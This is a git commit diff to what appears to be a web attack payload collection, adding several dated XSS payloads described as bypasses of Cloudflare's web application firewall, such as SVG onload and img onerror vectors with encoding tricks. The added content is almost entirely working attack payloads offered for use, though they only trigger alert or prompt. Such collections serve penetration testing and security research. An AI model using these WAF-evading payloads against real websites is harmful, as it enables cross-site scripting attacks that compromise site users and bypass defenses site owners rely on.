Merge pull request #188 from bohdansec/master

Update Cloudflare XSS bypasses
2024-12-18 18:36:10 +00:00 · 2020-04-21 23:57:06 +02:00 · 2020-04-21 23:57:06 +02:00 · bf73393921
commit bf73393921
parent 735b0d2277 c4af354d8f
1 changed files with 21 additions and 1 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@ -975,7 +975,27 @@ Works for CSP like `script-src 'self' data:`

 ## Common WAF Bypass

-### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019
+### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
+
+#### 21st april 2020
+
+```html
+<svg/OnLoad="`${prompt``}`">
+```
+
+#### 22nd august 2019
+
+```html
+<svg/onload=%26nbsp;alert`bohdan`+
+```
+
+#### 5th jule 2019
+
+```html
+1'"><img/src/onerror=.1|alert``>
+```
+
+#### 3rd june 2019

 ```html
 <svg onload=prompt%26%230000000040document.domain)>